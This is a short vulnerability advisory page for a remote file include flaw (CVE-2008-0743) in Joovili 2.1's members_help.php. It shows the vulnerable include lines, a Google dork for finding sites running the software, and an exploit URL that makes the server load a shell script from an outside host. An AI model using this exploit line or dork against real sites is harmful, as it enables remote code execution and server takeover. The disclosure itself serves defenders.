Bug: Joovili <= v.2.1 (members_help.php) Remote File Include Vulnerability ( Ascii Version )

Search:
WLB2

Joovili <= v.2.1 (members_help.php) Remote File Include Vulnerability

Published
Credit
Risk
2008.02.13
Cr@zy_King
Medium
CWE
CVE
Local
Remote
CWE-94
CVE-2008-0743
No
Yes
 Dork: &#169; Powered by Joovili v.2.1

CVSS Base Score
Impact Subscore
Exploitability Subscore
10/10
10/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Complete
Complete
Complete

Bulan : Cr@zy_King

Thanks : DreamTurk & Crackers_Child & Eno7 & The_Bekir & Pablin77 & Byond Crew & sys7ech

Script : Joovili

Versiyon : v2.1

Google Dork : &#169; Powered by Joovili v.2.1

Risk : Remote File &#304;nclude

Error :

include $hlp."include/settings.inc.php";

include $hlp."include/replace.inc.php";

Files : members_help.php

Rf&#305; Exploit : http://localhost/members_help.php?hlp=http://shell.com/shell.txt?

Bora Abi ( Crackers_Child ) Sen bizim her&#351;eyimizsin be abi :D Seni sevioz

AYYILDIZ SWAT TIM :|

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version